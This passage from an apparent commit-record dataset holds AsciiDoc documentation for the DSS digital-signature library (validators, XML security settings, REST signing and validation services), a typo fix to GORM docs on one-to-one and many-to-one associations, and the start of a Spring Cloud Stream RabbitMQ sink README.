module);\n * JAdESDocumentValidatorFactory : loads JWSCompactDocumentValidator or JWSSerializationDocumentValidator, depending on provided JSON signature type (delivered in dss-jades module);\n * ASiCContainerWithCAdESValidatorFactory : loads ASiCContainerWithCAdESValidator (delivered in dss-asic-cades module);\n * ASiCContainerWithXAdESValidatorFactory : loads ASiCContainerWithXAdESValidator (delivered in dss-asic-xades module);\n * DetachedTimestampValidatorFactory : loads DetachedTimestampValidator, for an indepenedent timestamp validation (delivered in dss-document module).\n\n=== Signature Policy Validator\n\nThis interface is used to validate a signature policy reference extracted from a signature. The following implementations are provided:\n\n * BasicASNSignaturePolicyValidator : validates policy files, which are based on ETSI TR 102 272;\n * XMLSignaturePolicyValidator : validates XML signature policies supporting transformations;\n * NonASN1SignaturePolicyValidator : validates a policy by digest computed on an original file's content;\n * ZeroHashSignaturePolicyValidator : validates a policy if \"zero hash\" value is defined in a signature (see <<R02>>);\n * EmptySignaturePolicyValidator : is proceeded if a policy file is not found or not accessible.\n\n== Multi-threading\n\nDSS can be used in multi-threaded environments but some points need to be considered like resources sharing and caching. All operations are stateless and this fact requires to be maintained. Some resources can be shared, others are proper to an operation. \n\nFor each provided operation, DSS requires a CertificateVerifier object. This object is responsible to provide certificates and accesses to external resources (AIA, CRL, OCSP,...). At the beginning of all operation, CertificateSources and RevocationSources are created for each signature \/ timestamp \/ revocation data. Extracted information are combined with the configured sources in the CertificateVerifier. For these reasons, integrators need to be careful about the CertificateVerifier configuration.\n\n=== Resource sharing\n\nThe trusted certificates can be shared between multiple threads because these certificates are static. This means they don't require more analysis. Their status won't evolve. For these certificates, DSS doesn't need to collect issuer certificate and\/or their revocation data. \n\nIn opposition, the adjunct certificates cannot be shared. These certificates concern a specific signature\/validation operation. This parameter is used to provide missing certificate(s). When DSS is unable to build the complete certificate path with the provided certificates (as signature parameters or embedded within a signature), it is possible to inject not present certificates. These certificates are not necessarily trusted and may require future \"modifications\" like revocation data collection,... \n\n=== Caching\n\nIn case of multi-threading usage, we strongly recommend caching of external resources. All external resources can be cached (AIA, CRL, OCSP) to improve performances and to avoid requesting too much time the same resources. FileCacheDataLoader and JdbcCacheCRLSource can help you in this way. \n\n[[xmlSecurities]]\n== XML Securities\n\nSince DSS 5.7, the framework allows custom configuration of XML-related modules for enabling\/disabling of XML securities (e.g. in order to use Xalan or Xerces).\n\nWARNING: We strongly do not recommend disabling of security features and usage of deprecated dependencies. Be aware: the feature is designed only for experienced users, and all changes made in the module are at your own risk.\n\nThe configuration is available for the following classes:\n\n * `javax.xml.parsers.DocumentBuilderFactory` with a `DocumentBuilderFactoryBuilder` - builds a DOM document object from the obtained XML file and creates a new Document;\n * `javax.xml.transform.TransformerFactory` with a `TransformerFactoryBuilder` - loads XML templates and builds DOM objects;\n * `javax.xml.validation.SchemaFactory` with a `SchemaFactoryBuilder` - loads XML Schema;\n * `javax.xml.validation.Validator` with a `ValidatorConfigurator` - configures a validator to validate an XML document against an XML Schema. \n \nAll the classes can be configured with the following methods (example for `TransformerFactory`):\n\n[source,java,indent=0]\n.XMLSecurities configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/XMLSecuritiesConfigTest.java[tags=demo]\n----\n\nThe `javax.xml.parsers.DocumentBuilderFactory`, that allows XML files parsing and creation of DOM `Document` object, can be configured with the following methods:\n\nNOTE: Since DSS 5.9 the configuration of `javax.xml.parsers.DocumentBuilderFactory` has been moved from `DomUtils` to a new singleton class `DocumentBuilderFactoryBuilder`.\n\n[source,java,indent=0]\n.DocumentBuilderFactory configuration\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/XMLSecuritiesConfigTest.java[tags=dbf]\n----\n\nThe class `XmlDefinerUtils` is a singleton, therefore all changes performed on the instance will have an impact to all calls of the related methods.\n\n== JAXB modules\n\nSince the version 5.5, DSS provides the following JAXB modules with a harmonized structure : \n\n * `dss-policy-jaxb` - defines validation policy JAXB model\n * `dss-diagnostic-jaxb` - defines Diagnostic Data JAXB model\n * `dss-detailed-report-jaxb` - defines Detailed Report JAXB model\n * `dss-simple-report-jaxb` - defines Simple Report JAXB model\n * `dss-simple-certificate-report-jaxb` - defines Certificate Simple Report JAXB model\n \nAll modules share the same logic and have the following structure (where *** is a model name):\n\n`*_dss-***-jaxb_*`::\n\t`*_src\/main\/java_*`:::\n\t\t`*_eu.europa.esig.dss.***_*`::::\n\t\t\t** `*_***.java_*` - wrapper(s) which eases the JAXB manipulation\n\t\t\t** `*_..._*`\n\t\t\t** `*_***Facade.java_*` - class which allows marshalling\/unmarshalling of jaxb objects, generation of HTML\/PDF content, etc.\n\t\t\t** `*_***XmlDefiner.java_*` - class which contains the model definition (XSD, XSLT references, ObjectFactory)\n\t\t\t** `*_jaxb_*` - generated on compile time\n\t\t\t \t*** `*_Xml***.java_*` - JAXB model\n\t\t\t\t*** `*_..._*`\n\t`*_src\/main\/resources_*`:::\n\t\t`*_xsd_*`::::\n\t\t\t** `*_***.xsd_*` - XML Schema (XSD) for the Detailed Report model\n\t\t\t** `*_binding.xml_*` - XJC instructions to generate the JAXB model from the XSD\n\t\t`*_xslt_*`::::\n\t\t\t** `*_html_*`\n\t\t\t*** \t`*_***.xslt_*` - XML Stylesheet for the HTML generation\n\t\t\t** `*_pdf_*`\n\t\t\t***\t`*_***.xslt_*` - XML Stylesheet for the PDF generation\n\nIn the main classes, a `Facade` is present to quickly operate with the JAXB objects (eg: marshall, unmarshall, generate the HTML\/PDF, validate the XML structure,...).\t\n\n[source,java,indent=0]\n.DetailedReportFacade usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/SignedDocumentValidatorTest.java[tags=demo-facade]\n----\n\nA `XmlDefiner` is also available with the access to the embedded XML Schemas (XSD), the XML Stylesheets (XSLT) to be able to generate the HTML or the PDF content (for DSS specific JAXB) and the JAXB Object Factory.\n\n[source,java,indent=0]\n.DetailedReportXmlDefiner usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/SignedDocumentValidatorTest.java[tags=demo-xml-definer]\n----\n\n=== Report stylesheets\n\nThe report modules (namely: `dss-simple-report-jaxb`, `dss-simple-certificate-report-jaxb` and `dss-detailed-report-jaxb`) contain two XSLT style sheets each for final reports generation:\n\n * Bootstrap 4 XSLT for HTML report;\n * PDF XSLT for PDF report.\n\nNOTE: Since DSS 5.9 only Bootstrap 4 XSLT is provided within the framework for HTML report generation.\n \nIn order to generate a report with a selected style sheet you need to call a relevant method in a Facade class (see classes definition above):\n\n[source,java,indent=0]\n.HTML report generation\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/StylesheetSnippet.java[tags=demo]\n----\n\nOtherwise, in case if you need to customize the transformer, you can create a report by using an XmlDefiner:\n\n[source,java,indent=0]\n.Custom report generation\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/StylesheetSnippet.java[tags=custom]\n----\n\n== Alerts\n\nSince DSS 5.7 the framework includes an extended possibility to execute custom processes in case of arbitrary defined events.\n\nThe `Alert` is a basic interface used to trigger a process on a passed object.\nDSS provides an `AbstractAlert` implementation of the interface with a clearly defined structure. The class must be instantiated with two attributes:\n\n * `AlertDetector` - used to detect an event\/state of the object and trigger a process;\n * `AlertHandler` - defines a process to be executed on an object.\n\nIn its basic module, framework provides a few alerts based on a `Status`:\n\n * `ExceptionOnStatusAlert` - throws an `AlertException` (RuntimeException) when the status reports an issue;\n * `LogOnStatusAlert` - logs a message with the defined log level;\n * `SilentOnStatusAlert` - ignores the reported issue and does nothing.\n\nThe usage of alerts is available in the following classes:\n\n * <<xmlSecurities>> configurators from `dss-jaxb-parsers` module : `TransformerFactoryBuilder`, `SchemaFactoryBuilder`, `ValidatorConfigurator`;\n * <<certificateVerifier>> - to handle the unexpected situation(s) in a custom way (introduced `AlertException` to re-throw exceptions);\n * <<tlValidationJob>> - to process custom actions on change\/state on loading of LOTL\/TLs (see `LOTLAlert` and `TLAlert`).\n\n== I18N (Internationalization)\n\nSince DSS 5.6 a new module has been introduced allowing changing of a language for reports generated by DSS. The current version of the framework allows customization of text values only for a `DetailedReport`.\n\nA target language of the report can be set with the following code:\n\n[source,java,indent=0]\n.Language customization\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/Snippets.java[tags=i18n]\n----\n\nIn case if no language is specified, the framework will use a default Locale obtained from OS on a running machine. If a requested language is not found, a default translation will be used.\n\nAs a default configuration DSS provides English translation.\n\nIn order to provide a custom translation, a new file must be created inside `src\\main\\resources` directory of your project with a name followed by one of the patterns: \n\n`dss-messages_XX.properties` or \n`dss-messages_XX_YY.properties`, where:\n\n * XX - an abbreviation of a target language;\n * YY - a country code.\n\nFor example, for a French language a file with a name `dss-messages_fr.properties` need to be created, or `dss-messages_fr_FR.properties` to use it only in France local.\n\n== Additional features\n\n=== Certificate validation\n\nDSS offers the possibility to validate a certificate. For a given certificate, the framework builds a certificate path until a known trust anchor (trusted list, keystore,...), validates each found certificate (OCSP \/ CRL) and determines its European \"qualification\". \n\nTo determine the certificate qualification, DSS follows the draft standard ETSI TS 119 172-4 (<<R10>>). It analyses the certificate properties (QCStatements, Certificate Policies,...) and applies possible overrules from the related trusted list (\"catched\" qualifiers from a trust service). More information about qualifiers can be found in the standard ETSI TS 119 612 (<<R11>>).\n\nDSS always computes the status at 2 different times : certificate issuance and signing\/validation time. The certificate qualification can evolve in the time, its status is not immutable (eg: a trust service provider lost its granted status). The eIDAS regulation (<<R12>>) clearly defines these different times in the Article 32 and related Annex I. \n\n[source,java,indent=0]\n.Validate a certificate and retrieve its qualification level\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/validate\/CertificateValidationTest.java[tags=demo]\n----\n\n=== SSL Certificate validation (QWAC)\n\nWith DSS, that's also possible to validate SSL certificate against the EUMS TL and the ETSI TS 119 615 to determine if it is a Qualified certificate for WebSite Authentication (QWAC).\n\n[source,java,indent=0]\n.Validate a SSL certificate and retrieve its qualification level\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/validate\/QWACValidationTest.java[tags=demo]\n----\n\n=== Extract the signed data from a signature\n\nDSS is able to retrieve the original data from a valid signature. \n\n[source,java,indent=0]\n.Retrieve original data from a signed document\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/validate\/RetrieveOriginalDocumentTest.java[tags=demo]\n----\n\n== REST and SOAP Services\n\nDSS offers REST and SOAP web services. Additionally, we also provide a SOAP-UI project and Postman samples in the `dss-cookbook` module.\n\nThe different webservices are : \n\n * Signature webservices (`dss-signature-soap` \/ `dss-signature-rest`) and their clients : they expose methods to allow signing and extending or counter-signing a signature from a client.\n * Server-signing webservice (`dss-server-signing-soap` \/ `dss-server-signing-rest`) and their clients : they expose method to retrieve keys from a server (PKCS#11, PKCS#12, HSM,...) and to sign the digest on the server side.\n * Signature validation webservices (`dss-validation-soap` \/ `dss-validation-rest`) and their clients : they expose methods to allow signature validation, with an optional detached file and an optional validation policy.\n * Certificate validation webservices (`dss-certificate-validation-soap` \/ `dss-certificate-validation-rest`) and their clients : they expose methods to allow certificate validation, with an optional provided certificate chain and custom validation time.\n * Timestamp webservices (`dss-timestamp-remote-soap` \/ `dss-timestamp-remote-rest`) and their clients : they expose methos to allow remote timestamp creation, by providing digest value to be timestamped and a digest algorithm, used for the digets calculation.\n \nThe data structure in webservices is similar in both REST and SOAP modules.\n\nThe documentation will covers the REST calls. All the REST services present in DSS are compliant with https:\/\/www.openapis.org\/[OpenAPI Specification].\n\n=== REST signature service\n\nThis service exposes 4 methods for one or more document(s) : \n\n[source,java,indent=0]\n.Rest signature service\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/RestSignatureServiceSnippet.java[tags=demo]\n----\n \n==== Get data to sign\n\nThe method allows retrieving the data to be signed. The user sends the document to be signed, the parameters (signature level,...) and the certificate chain. \n\nWARNING: The parameters in getDataToSign and signDocument MUST be the same (especially the signing date).\n\n.Request\ninclude::_restdocs\/sign-and-extend-one-document\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/sign-and-extend-one-document\/1\/http-response.adoc[]\n\n==== Sign document\n\nThe method allows generation of the signed document with the received signature value.\n\nWARNING: The parameters in getDataToSign and signDocument MUST be the same (especially the signing date).\n\n.Request\ninclude::_restdocs\/sign-and-extend-one-document\/2\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/sign-and-extend-one-document\/2\/http-response.adoc[]\n\n==== Extend document\n\nThe method allows extension of an existing signature to a stronger level.\n\n.Request\ninclude::_restdocs\/sign-and-extend-one-document\/3\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/sign-and-extend-one-document\/3\/http-response.adoc[]\n\n==== Timestamp document\n\nThe method allows timestamping of a provided document.\nAvailable for PDF, ASiC-E and ASiC-S container formats.\n\n.Request\ninclude::_restdocs\/timestamp-one-document\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/timestamp-one-document\/1\/http-response.adoc[]\n\n==== Get data to be counter signed\n\nThis method returns the data to be signed in order to create a counter signature. The user should provide a document containing a signature to be counter signed, id of the signature, and other parameters similarly to the method 'getDataToSign()'.\n\nWARNING: The parameters in getDataToBeCounterSigned and counterSignSignature MUST be the same (especially the signing date).\n\n.Request\ninclude::_restdocs\/counter-sign-signature\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/counter-sign-signature\/1\/http-response.adoc[]\n\n==== Counter Sign Signature\n\nThis method incorporates a created counter signature to unsigned properties of the master signature with this specified id.\n\nWARNING: The parameters in getDataToBeCounterSigned and counterSignSignature MUST be the same (especially the signing date).\n\n.Request\ninclude::_restdocs\/counter-sign-signature\/2\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/counter-sign-signature\/2\/http-response.adoc[]\n\n=== REST server signature service\n\nThis service also exposed 4 methods : \n\n[source,java,indent=0]\n.Rest server signing service\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/RestServerSigningSnippet.java[tags=demo]\n----\n\n==== Get keys\n\nThis method allows retrieving of all available keys on the server side (PKCS#11, PKCS#12, HSM,...). All keys will have an alias, a signing certificate and its chain. The alias will be used in following steps.\n\n.Request\ninclude::_restdocs\/get-keys\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/get-keys\/1\/http-response.adoc[]\n\n==== Get key\n\nThis method allows retrieving a key information for a given alias.\n\n.Request\ninclude::_restdocs\/get-key\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/get-key\/1\/http-response.adoc[]\n\n==== Sign\n\nThis method allows signing of given digests with a server side certificate.\n\n.Request\ninclude::_restdocs\/sign-digest-document-remotely\/3\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/sign-digest-document-remotely\/3\/http-response.adoc[]\n\n=== REST validation service\n\nDSS provides also a module for documents validation.\n\n==== Validate a document\n\nThis service allows a signature validation (all formats\/types) against a validation policy.\n\n.Request\ninclude::_restdocs\/validate-doc\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/validate-doc\/1\/http-response.adoc[]\n\n==== Retrieve original document(s)\n\nThis service returns the signed data for a given signature.\n\n.Request\ninclude::_restdocs\/get-original-documents\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/get-original-documents\/1\/http-response.adoc[]\n\n=== REST certificate validation service\n\n==== Validate a certificate\n\nThis service allows a certificate validation (provided in a binary format).\n\n.Request\ninclude::_restdocs\/validate-cert\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/validate-cert\/1\/http-response.adoc[]\n\n=== REST remote timestamp service\n\n==== Get Timestamp Response\n\nThis service allows a remote timestamp creation. The method takes as an input the digest to be timestamped and digest algorithm that has been used for the digest value computation. The output of the method is the generated timestamp's binaries.\n\n.Request\ninclude::_restdocs\/get-timestamp-response\/1\/http-request.adoc[]\n\n.Response\ninclude::_restdocs\/get-timestamp-response\/1\/http-response.adoc[]\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"197a1dfd07b777794227406223c2140c6b836b9a","subject":"Update manyToOneAndOneToOne.adoc - minor typo","message":"Update manyToOneAndOneToOne.adoc - minor typo","repos":"grails\/gorm-hibernate5","old_file":"docs\/src\/docs\/asciidoc\/domainClasses\/gormAssociation\/manyToOneAndOneToOne.adoc","new_file":"docs\/src\/docs\/asciidoc\/domainClasses\/gormAssociation\/manyToOneAndOneToOne.adoc","new_contents":"A many-to-one relationship is the simplest kind, and is defined with a property of the type of another domain class. Consider this example:\n\n\n===== Example A\n\n[source,groovy]\n----\nclass Face {\n Nose nose\n}\n----\n\n[source,groovy]\n----\nclass Nose {\n}\n----\n\nIn this case we have a unidirectional many-to-one relationship from `Face` to `Nose`. To make this relationship bidirectional define the other side as follows (and see the section on controlling the ends of the association just below):\n\n\n===== Example B\n\n\n[source,groovy]\n----\nclass Face {\n Nose nose\n}\n----\n\n[source,groovy]\n----\nclass Nose {\n static belongsTo = [face:Face]\n}\n----\n\nIn this case we use the `belongsTo` setting to say that `Nose` \"belongs to\" `Face`. The result of this is that we can create a `Face`, attach a `Nose` instance to it and when we save or delete the `Face` instance, GORM will save or delete the `Nose`. In other words, saves and deletes will cascade from `Face` to the associated `Nose`:\n\n[source,groovy]\n----\nnew Face(nose:new Nose()).save()\n----\n\nThe example above will save both face and nose. Note that the inverse _is not_ true and will result in an error due to a transient `Face`:\n\n[source,groovy]\n----\nnew Nose(face:new Face()).save() \/\/ will cause an error\n----\n\nNow if we delete the `Face` instance, the `Nose` will go too:\n\n[source,groovy]\n----\ndef f = Face.get(1)\nf.delete() \/\/ both Face and Nose deleted\n----\n\nTo make the relationship a true one-to-one, use the `hasOne` property on the owning side, e.g. `Face`:\n\n\n===== Example C\n\n\n[source,groovy]\n----\nclass Face {\n static hasOne = [nose:Nose]\n}\n----\n\n[source,groovy]\n----\nclass Nose {\n Face face\n}\n----\n\nNote that using this property puts the foreign key on the inverse table to the example A, so in this case the foreign key column is stored in the `nose` table inside a column called `face_id`.\n\nNOTE: `hasOne` only works with bidirectional relationships.\n\nFinally, it's a good idea to add a unique constraint on one side of the one-to-one relationship:\n\n[source,groovy]\n----\nclass Face {\n static hasOne = [nose:Nose]\n\n static constraints = {\n nose unique: true\n }\n}\n----\n\n[source,groovy]\n----\nclass Nose {\n Face face\n}\n----\n\n\n===== Controlling the ends of the association\n\n\nOccasionally you may find yourself with domain classes that have multiple properties of the same type. They may even be self-referential, i.e. the association property has the same type as the domain class it's in. Such situations can cause problems because GORM may guess incorrectly the type of the association. Consider this simple class:\n\n[source,groovy]\n----\nclass Person {\n String name\n Person parent\n\n static belongsTo = [ supervisor: Person ]\n\n static constraints = { supervisor nullable: true }\n}\n----\n\nAs far as GORM is concerned, the `parent` and `supervisor` properties are two directions of the same association. So when you set the `parent` property on a `Person` instance, GORM will automatically set the `supervisor` property on the other `Person` instance. This may be what you want, but if you look at the class, what we in fact have are two unidirectional relationships.\n\nTo guide GORM to the correct mapping, you can tell it that a particular association is unidirectional through the `mappedBy` property:\n\n[source,groovy]\n----\nclass Person {\n String name\n Person parent\n\n static belongsTo = [ supervisor: Person ]\n\n static mappedBy = [ supervisor: \"none\", parent: \"none\" ]\n\n static constraints = { supervisor nullable: true }\n}\n----\n\nYou can also replace \"none\" with any property name of the target class. And of course this works for normal domain classes too, not just self-referential ones. Nor is the `mappedBy` property limited to many-to-one and one-to-one associations: it also works for one-to-many and many-to-many associations as you'll see in the next section.\n\nWARNING: If you have a property called \"none\" on your domain class, this approach won't work currently! The \"none\" property will be treated as the reverse direction of the association (or the \"back reference\"). Fortunately, \"none\" is not a common domain class property name.\n\n===== Replacing a many-to-one collection\n\nGiven these GORM entities:\n\n[source,groovy]\n----\nclass Book {\n String name\n static hasMany = [reviews: Review]\n}\nclass Review {\n String author\n String quote\n static belongsTo = [book: Book]\n}\n----\n\nImagine you have a book with two reviews:\n\n[source,groovy]\n----\nnew Book(name: 'Daemon')\n .addToReviews(new Review(quote: 'Daemon does for surfing the Web what Jaws did for swimming in the ocean.', author: 'Chicago Sun-Times'))\n .addToReviews(new Review(quote: 'Daemon is wet-yourself scary, tech-savvy, mind-blowing!', author: 'Paste Magazine'))\n .save()\n----\n\nYou could create a method to replace the `reviews` collection as illustrated next:\n\n[source,groovy]\n----\nBook replaceReviews(Serializable idParam, List<Review> newReviews) {\n Book book = Book.where { id == idParam }.join('reviews').get()\n clearReviews(book)\n newReviews.each { book.addToReviews(it) }\n book.save()\n}\n\nvoid clearReviews(Book book) {\n List<Serializable> ids = []\n book.reviews.collect().each {\n book.removeFromReviews(it)\n ids << it.id\n }\n Review.executeUpdate(\"delete Review r where r.id in :ids\", [ids: ids])\n}\n----\n\nAlternatively you could leverage http:\/\/docs.grails.org\/latest\/ref\/Database%20Mapping\/cascade.html[cascade] behaviour.\n\n[source,groovy]\n----\nclass Book {\n String name\n static hasMany = [reviews: Review]\n static mappping = {\n reviews cascade: 'all-delete-orphan'\n }\n}\nclass Review {\n String author\n String quote\n static belongsTo = [book: Book]\n}\n----\n\nThe cascade behaviour takes cares of deleting every orphan `Review`. Thus, invoking `.clear()` suffices to remove the book's previous reviews.\n\n[source,groovy]\n----\nBook replaceReviews(Serializable idParam, List<Review> newReviews) {\n Book book = Book.where { id == idParam }.join('reviews').get()\n book.reviews.clear()\n newReviews.each { book.addToReviews(it) }\n book.save()\n}\n----\n","old_contents":"A many-to-one relationship is the simplest kind, and is defined with a property of the type of another domain class. Consider this example:\n\n\n===== Example A\n\n[source,groovy]\n----\nclass Face {\n Nose nose\n}\n----\n\n[source,groovy]\n----\nclass Nose {\n}\n----\n\nIn this case we have a unidirectional many-to-one relationship from `Face` to `Nose`. To make this relationship bidirectional define the other side as follows (and see the section on controlling the ends of the association just below):\n\n\n===== Example B\n\n\n[source,groovy]\n----\nclass Face {\n Nose nose\n}\n----\n\n[source,groovy]\n----\nclass Nose {\n static belongsTo = [face:Face]\n}\n----\n\nIn this case we use the `belongsTo` setting to say that `Nose` \"belongs to\" `Face`. The result of this is that we can create a `Face`, attach a `Nose` instance to it and when we save or delete the `Face` instance, GORM will save or delete the `Nose`. In other words, saves and deletes will cascade from `Face` to the associated `Nose`:\n\n[source,groovy]\n----\nnew Face(nose:new Nose()).save()\n----\n\nThe example above will save both face and nose. Note that the inverse _is not_ true and will result in an error due to a transient `Face`:\n\n[source,groovy]\n----\nnew Nose(face:new Face()).save() \/\/ will cause an error\n----\n\nNow if we delete the `Face` instance, the `Nose` will go too:\n\n[source,groovy]\n----\ndef f = Face.get(1)\nf.delete() \/\/ both Face and Nose deleted\n----\n\nTo make the relationship a true one-to-one, use the `hasOne` property on the owning side, e.g. `Face`:\n\n\n===== Example C\n\n\n[source,groovy]\n----\nclass Face {\n static hasOne = [nose:Nose]\n}\n----\n\n[source,groovy]\n----\nclass Nose {\n Face face\n}\n----\n\nNote that using this property puts the foreign key on the inverse table to the example A, so in this case the foreign key column is stored in the `nose` table inside a column called `face_id`.\n\nNOTE: `hasOne` only works with bidirectional relationships.\n\nFinally, it's a good idea to add a unique constraint on one side of the one-to-one relationship:\n\n[source,groovy]\n----\nclass Face {\n static hasOne = [nose:Nose]\n\n static constraints = {\n nose unique: true\n }\n}\n----\n\n[source,groovy]\n----\nclass Nose {\n Face face\n}\n----\n\n\n===== Controlling the ends of the association\n\n\nOccasionally you may find yourself with domain classes that have multiple properties of the same type. They may even be self-referential, i.e. the association property has the same type as the domain class it's in. Such situations can cause problems because GORM may guess incorrectly the type of the association. Consider this simple class:\n\n[source,groovy]\n----\nclass Person {\n String name\n Person parent\n\n static belongsTo = [ supervisor: Person ]\n\n static constraints = { supervisor nullable: true }\n}\n----\n\nAs far as GORM is concerned, the `parent` and `supervisor` properties are two directions of the same association. So when you set the `parent` property on a `Person` instance, GORM will automatically set the `supervisor` property on the other `Person` instance. This may be what you want, but if you look at the class, what we in fact have are two unidirectional relationships.\n\nTo guide GORM to the correct mapping, you can tell it that a particular association is unidirectional through the `mappedBy` property:\n\n[source,groovy]\n----\nclass Person {\n String name\n Person parent\n\n static belongsTo = [ supervisor: Person ]\n\n static mappedBy = [ supervisor: \"none\", parent: \"none\" ]\n\n static constraints = { supervisor nullable: true }\n}\n----\n\nYou can also replace \"none\" with any property name of the target class. And of course this works for normal domain classes too, not just self-referential ones. Nor is the `mappedBy` property limited to many-to-one and one-to-one associations: it also works for one-to-many and many-to-many associations as you'll see in the next section.\n\nWARNING: If you have a property called \"none\" on your domain class, this approach won't work currently! The \"none\" property will be treated as the reverse direction of the association (or the \"back reference\"). Fortunately, \"none\" is not a common domain class property name.\n\n===== Replacing a many-to-one collection\n\nGiven these GORM entities:\n\n[source,groovy]\n----\nclass Book {\n String name\n static hasMany = [reviews: Review]\n}\nclass Review {\n String author\n String quote\n static belongsTo = [book: Book]\n}\n----\n\nImagine you have a book with two reviews:\n\n[source,groovy]\n----\nnew Book(name: 'Daemon')\n .addToReviews(new Review(quote: 'Daemon does for surfing the Web what Jaws did for swimming in the ocean.', author: 'Chicago Sun-Times'))\n .addToReviews(new Review(quote: 'Daemon is wet-yourself scary, tech-savvy, mind-blowing!', author: 'Paste Magazine'))\n .save()\n----\n\nYou could create a method to replace the `reviews` collection as illustrated next:\n\n[source,groovy]\n----\nBook replaceReviews(Serializable idParam, List<Review> newReviews) {\n Book book = Book.where { id == idParam }.join('reviews').get()\n clearReviews(book)\n newReviews.each { book.addToReviews(it) }\n book.save()\n}\n\nvoid clearReviews(Book book) {\n List<Serializable> ids = []\n book.reviews.collect().each {\n book.removeFromReviews(it)\n ids << it.id\n }\n Review.executeUpdate(\"delete Review r where r.id in :ids\", [ids: ids])\n}\n----\n\nAlternatively you could leverage http:\/\/docs.grails.org\/latest\/ref\/Database%20Mapping\/cascade.html[cascade] behaviour.\n\n[source,groovy]\n----\nclass Book {\n String name\n static hasMany = [reviews: Review]\n static mappping = {\n reviews cascade: 'all-delete-orphan'\n }\n}\nclass Review {\n String author\n String quote\n static belongsTo = [book: Book]\n}\n----\n\nThe cascade behaviour takes cares of deleting every orphan `Review`. Thus, invoking `.clear()` suffices to remove the book' previous reviews.\n\n[source,groovy]\n----\nBook replaceReviews(Serializable idParam, List<Review> newReviews) {\n Book book = Book.where { id == idParam }.join('reviews').get()\n book.reviews.clear()\n newReviews.each { book.addToReviews(it) }\n book.save()\n}\n----","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e2774963227bb71b97faa7868c832b53e99ce76c","subject":"Fixing a doc tag thats causing the -Pfull build to fail on CI","message":"Fixing a doc tag thats causing the -Pfull build to fail on CI\n","repos":"spring-cloud\/spring-cloud-stream-app-starters,spring-cloud\/spring-cloud-stream-app-starters,sobychacko\/spring-cloud-stream-app-starters,sobychacko\/spring-cloud-stream-app-starters,sobychacko\/spring-cloud-stream-app-starters,spring-cloud\/spring-cloud-stream-app-starters,spring-cloud\/spring-cloud-stream-app-starters,sobychacko\/spring-cloud-stream-app-starters","old_file":"rabbit\/spring-cloud-starter-stream-sink-rabbit\/README.adoc","new_file":"rabbit\/spring-cloud-starter-stream-sink-rabbit\/README.adoc","new_contents":"\/\/tag::ref-doc[]\n= RabbitMQ Sink\n\nThis module sends messages to RabbitMQ.\n\n== Options\n\nThe **$$rabbit$$** $$sink$$ has the following options:\n\n(See the Spring Boot documentation for RabbitMQ connection properties)\n\n\/\/tag::configuration-properties[]\n$$rabbit.converter-bean-name$$:: $$The bean name for a custom message converter; if omitted, a SimpleMessageConverter is used.\n If 'jsonConverter', a Jackson2JsonMessageConverter bean will be created for you.$$ *($$String$$, default: `<none>`)*\n$$rabbit.exchange$$:: $$Exchange name - overridden by exchangeNameExpression, if supplied.$$ *($$String$$, default: `<empty string>`)*\n$$rabbit.exchange-expression$$:: $$A SpEL expression that evaluates to an exchange name.$$ *($$Expression$$, default: `<none>`)*\n$$rabbit.mapped-request-headers$$:: $$Headers that will be mapped.$$ *($$String[]$$, default: **)\n$$rabbit.persistent-delivery-mode$$:: $$Default delivery mode when 'amqp_deliveryMode' header is not present,\n true for PERSISTENT.$$ *($$Boolean$$, default: `false`)*\n$$rabbit.routing-key$$:: $$Routing key - overridden by routingKeyExpression, if supplied.$$ *($$String$$, default: `<none>`)*\n$$rabbit.routing-key-expression$$:: $$A SpEL expression that evaluates to a routing key.$$ *($$Expression$$, default: `<none>`)*\n$$spring.rabbitmq.addresses$$:: $$Comma-separated list of addresses to which the client should connect to.$$ *($$String$$, default: `<none>`)*\n$$spring.rabbitmq.host$$:: $$RabbitMQ host.$$ *($$String$$, default: `localhost`)*\n$$spring.rabbitmq.password$$:: $$Login to authenticate against the broker.$$ *($$String$$, default: `<none>`)*\n$$spring.rabbitmq.port$$:: $$RabbitMQ port.$$ *($$Integer$$, default: `5672`)*\n$$spring.rabbitmq.requested-heartbeat$$:: $$Requested heartbeat timeout, in seconds; zero for none.$$ *($$Integer$$, default: `<none>`)*\n$$spring.rabbitmq.username$$:: $$Login user to authenticate to the broker.$$ *($$String$$, default: `<none>`)*\n$$spring.rabbitmq.virtual-host$$:: $$Virtual host to use when connecting to the broker.$$ *($$String$$, default: `<none>`)*\n\/\/end::configuration-properties[]\n\nNOTE: By default, the message converter is a `SimpleMessageConverter` which handles `byte[]`, `String` and\n`java.io.Serializable`.\nA well-known bean name `jsonConverter` will configure a `Jackson2JsonMessageConverter` instead.\nIn addition, a custom converter bean can be added to the context and referenced by the 